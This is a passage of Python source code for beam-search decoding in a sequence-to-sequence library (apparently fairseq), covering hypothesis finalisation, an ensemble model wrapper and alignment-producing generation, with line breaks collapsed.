tokens.size(-1))[ :, 0, 1 : step + 1 ] eos_mask_batch_dim = eos_mask.view(-1, beam_size)[:, 0] target_prefix = prefix_tokens[eos_mask_batch_dim][:, :step] assert (first_beam == target_prefix).all() # copy tokens, scores and lprobs from the first beam to all beams tokens = self.replicate_first_beam(tokens, eos_mask_batch_dim, beam_size) scores = self.replicate_first_beam(scores, eos_mask_batch_dim, beam_size) lprobs = self.replicate_first_beam(lprobs, eos_mask_batch_dim, beam_size) return lprobs, tokens, scores def replicate_first_beam(self, tensor, mask, beam_size: int): tensor = tensor.view(-1, beam_size, tensor.size(-1)) tensor[mask] = tensor[mask][:, :1, :] return tensor.view(-1, tensor.size(-1)) def finalize_hypos( self, step: int, bbsz_idx, eos_scores, tokens, scores, finalized: List[List[Dict[str, Tensor]]], finished: List[bool], beam_size: int, attn: Optional[Tensor], src_lengths, max_len: int, ): """Finalize hypothesis, store finalized information in `finalized`, and change `finished` accordingly. A sentence is finalized when {beam_size} finished items have been collected for it. Returns number of sentences (not beam items) being finalized. These will be removed from the batch and not processed further. Args: bbsz_idx (Tensor): """ assert bbsz_idx.numel() == eos_scores.numel() # clone relevant token and attention tensors. # tokens is (batch * beam, max_len). So the index_select # gets the newly EOS rows, then selects cols 1..{step + 2} tokens_clone = tokens.index_select(0, bbsz_idx)[ :, 1 : step + 2 ] # skip the first index, which is EOS tokens_clone[:, step] = self.eos attn_clone = ( attn.index_select(0, bbsz_idx)[:, :, 1 : step + 2] if attn is not None else None ) # compute scores per token position pos_scores = scores.index_select(0, bbsz_idx)[:, : step + 1] pos_scores[:, step] = eos_scores # convert from cumulative to per-position scores pos_scores[:, 1:] = pos_scores[:, 1:] - pos_scores[:, :-1] # normalize sentence-level scores if self.normalize_scores: eos_scores /= (step + 1) ** self.len_penalty # cum_unfin records which sentences in the batch are finished. # It helps match indexing between (a) the original sentences # in the batch and (b) the current, possibly-reduced set of # sentences. cum_unfin: List[int] = [] prev = 0 for f in finished: if f: prev += 1 else: cum_unfin.append(prev) cum_fin_tensor = torch.tensor(cum_unfin, dtype=torch.int).to(bbsz_idx) unfin_idx = torch.div(bbsz_idx, beam_size, rounding_mode="trunc") sent = unfin_idx + torch.index_select(cum_fin_tensor, 0, unfin_idx) # Create a set of "{sent}{unfin_idx}", where # "unfin_idx" is the index in the current (possibly reduced) # list of sentences, and "sent" is the index in the original, # unreduced batch # For every finished beam item # sentence index in the current (possibly reduced) batch seen = (sent << 32) + unfin_idx unique_seen: List[int] = torch.unique(seen).tolist() if self.match_source_len: condition = step > torch.index_select(src_lengths, 0, unfin_idx) eos_scores = torch.where(condition, torch.tensor(-math.inf), eos_scores) sent_list: List[int] = sent.tolist() for i in range(bbsz_idx.size()[0]): # An input sentence (among those in a batch) is finished when # beam_size hypotheses have been collected for it if len(finalized[sent_list[i]]) < beam_size: if attn_clone is not None: # remove padding tokens from attn scores hypo_attn = attn_clone[i] else: hypo_attn = torch.empty(0) finalized[sent_list[i]].append( { "tokens": tokens_clone[i], "score": eos_scores[i], "attention": hypo_attn, # src_len x tgt_len "alignment": torch.empty(0), "positional_scores": pos_scores[i], } ) newly_finished: List[int] = [] for unique_s in unique_seen: # check termination conditions for this sentence unique_sent: int = unique_s >> 32 unique_unfin_idx: int = unique_s - (unique_sent << 32) if not finished[unique_sent] and self.is_finished( step, unique_unfin_idx, max_len, len(finalized[unique_sent]), beam_size ): finished[unique_sent] = True newly_finished.append(unique_unfin_idx) return newly_finished def is_finished( self, step: int, unfin_idx: int, max_len: int, finalized_sent_len: int, beam_size: int, ): """ Check whether decoding for a sentence is finished, which occurs when the list of finalized sentences has reached the beam size, or when we reach the maximum length. """ assert finalized_sent_len <= beam_size if finalized_sent_len == beam_size or step == max_len: return True return False class EnsembleModel(nn.Module): """A wrapper around an ensemble of models.""" def __init__(self, models): super().__init__() self.models_size = len(models) # method '__len__' is not supported in ModuleList for torch script self.single_model = models[0] self.models = nn.ModuleList(models) self.has_incremental: bool = False if all( hasattr(m, "decoder") and isinstance(m.decoder, FairseqIncrementalDecoder) for m in models ): self.has_incremental = True def forward(self): pass def has_encoder(self): return hasattr(self.single_model, "encoder") def has_incremental_states(self): return self.has_incremental def max_decoder_positions(self): return min( [ m.max_decoder_positions() for m in self.models if hasattr(m, "max_decoder_positions") ] + [sys.maxsize] ) def set_decoder_beam_size(self, beam_size): """Set beam size for efficient beamable enc-dec attention.""" if beam_size > 1: for model in self.models: if hasattr(model, "set_beam_size"): model.set_beam_size(beam_size) @torch.jit.export def forward_encoder(self, net_input: Dict[str, Tensor]): if not self.has_encoder(): return None return [model.encoder.forward_torchscript(net_input) for model in self.models] @torch.jit.export def forward_decoder( self, tokens, encoder_outs: List[Dict[str, List[Tensor]]], incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]], temperature: float = 1.0, ): log_probs = [] avg_attn: Optional[Tensor] = None encoder_out: Optional[Dict[str, List[Tensor]]] = None for i, model in enumerate(self.models): if self.has_encoder(): encoder_out = encoder_outs[i] # decode each model if self.has_incremental_states(): decoder_out = model.decoder.forward( tokens, encoder_out=encoder_out, incremental_state=incremental_states[i], ) else: if hasattr(model, "decoder"): decoder_out = model.decoder.forward(tokens, encoder_out=encoder_out) else: decoder_out = model.forward(tokens) attn: Optional[Tensor] = None decoder_len = len(decoder_out) if decoder_len > 1 and decoder_out[1] is not None: if isinstance(decoder_out[1], Tensor): attn = decoder_out[1] else: attn_holder = decoder_out[1]["attn"] if isinstance(attn_holder, Tensor): attn = attn_holder elif attn_holder is not None: attn = attn_holder[0] if attn is not None: attn = attn[:, -1, :] decoder_out_tuple = ( decoder_out[0][:, -1:, :].div_(temperature), None if decoder_len <= 1 else decoder_out[1], ) probs = model.get_normalized_probs( decoder_out_tuple, log_probs=True, sample=None ) probs = probs[:, -1, :] if self.models_size == 1: return probs, attn log_probs.append(probs) if attn is not None: if avg_attn is None: avg_attn = attn else: avg_attn.add_(attn) avg_probs = torch.logsumexp(torch.stack(log_probs, dim=0), dim=0) - math.log( self.models_size ) if avg_attn is not None: avg_attn.div_(self.models_size) return avg_probs, avg_attn @torch.jit.export def reorder_encoder_out( self, encoder_outs: Optional[List[Dict[str, List[Tensor]]]], new_order ): """ Reorder encoder output according to *new_order*. Args: encoder_out: output from the ``forward()`` method new_order (LongTensor): desired order Returns: *encoder_out* rearranged according to *new_order* """ new_outs: List[Dict[str, List[Tensor]]] = [] if not self.has_encoder(): return new_outs for i, model in enumerate(self.models): assert encoder_outs is not None new_outs.append( model.encoder.reorder_encoder_out(encoder_outs[i], new_order) ) return new_outs @torch.jit.export def reorder_incremental_state( self, incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]], new_order, ): if not self.has_incremental_states(): return for i, model in enumerate(self.models): model.decoder.reorder_incremental_state_scripting( incremental_states[i], new_order ) class SequenceGeneratorWithAlignment(SequenceGenerator): def __init__( self, models, tgt_dict, left_pad_target=False, print_alignment="hard", **kwargs ): """Generates translations of a given source sentence. Produces alignments following "Jointly Learning to Align and Translate with Transformer Models" (Garg et al., EMNLP 2019). Args: left_pad_target (bool, optional): Whether or not the hypothesis should be left padded or not when they are teacher forced for generating alignments. """ super().__init__(EnsembleModelWithAlignment(models), tgt_dict, **kwargs) self.left_pad_target = left_pad_target if print_alignment == "hard": self.extract_alignment = utils.extract_hard_alignment elif print_alignment == "soft": self.extract_alignment = utils.extract_soft_alignment @torch.no_grad() def generate(self, models, sample, **kwargs): finalized = super()._generate(sample, **kwargs) src_tokens = sample["net_input"]["src_tokens"] bsz = src_tokens.shape[0] beam_size = self.beam_size ( src_tokens, src_lengths, prev_output_tokens, tgt_tokens, ) = self._prepare_batch_for_alignment(sample, finalized) if any(getattr(m, "full_context_alignment", False) for m in self.model.models): attn = self.model.forward_align(src_tokens, src_lengths, prev_output_tokens) else: attn = [ finalized[i // beam_size][i % beam_size]["attention"].transpose(1, 0) for i in range(bsz * beam_size) ] if src_tokens.device != "cpu": src_tokens = src_tokens.to("cpu") tgt_tokens = tgt_tokens.to("cpu") attn = [i.to("cpu") for i in attn] # Process the attn matrix to extract hard alignments. for i in range(bsz * beam_size): alignment = self.extract_alignment( attn[i], src_tokens[i], tgt_tokens[i], self.pad, self.eos ) finalized[i // beam_size][i % beam_size]["alignment"] = alignment return finalized def _prepare_batch_for_alignment(self, sample, hypothesis): src_tokens = sample["net_input"]["src_tokens"] bsz = src_tokens.shape[0] src_tokens = ( src_tokens[:, None, :] .expand(-1, self.beam_size, -1) .contiguous() .view(bsz * self.beam_size, -1) ) src_lengths = sample["net_input"]["src_lengths"] src_lengths = ( src_lengths[:, None] .expand(-1, self.beam_size) .contiguous() .view(bsz * self.beam_size) ) prev_output_tokens = data_utils.collate_tokens( [beam["tokens"] for example in hypothesis for beam in example], self.pad, self.eos, self.left_pad_target, move_eos_to_beginning=True, ) tgt_tokens = data_utils.collate_tokens( [beam["tokens"] for example in hypothesis for beam in example], self.pad, self.eos, self.left_pad_target, move_eos_to_beginning=False, ) return src_tokens, src_lengths, prev_output_tokens, tgt_tokens class EnsembleModelWithAlignment(EnsembleModel): """A wrapper around an ensemble of models.""" def __init__(self, models): super().__init__(models) def forward_align(self, src_tokens, src_lengths, prev_output_tokens): avg_attn = None for model in self.models: decoder_out = model(src_tokens, src_lengths, prev_output_tokens) attn = decoder_out[1]["attn"][0] if avg_attn is None: avg_attn = attn else: avg_attn.add_(attn) if len(self.models) > 1: avg_attn.div_(len(self.models)) return avg_attn
39.859719
110
0.574837